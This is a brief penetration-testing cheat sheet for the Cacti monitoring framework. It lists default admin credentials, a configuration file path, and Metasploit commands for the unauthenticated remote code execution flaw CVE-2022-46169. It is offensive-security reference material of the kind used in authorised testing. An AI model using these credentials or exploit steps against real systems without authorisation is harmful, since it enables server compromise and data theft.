Cacti Pentesting
Last modified: 2023-05-02
Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.
Default Credentials
admin:admin
Common Directories
/include/config.php
Remote Code Execution (RCE) CVE-2022-46169
Reference: https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/
msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run
Also we can refer to Exploit DB.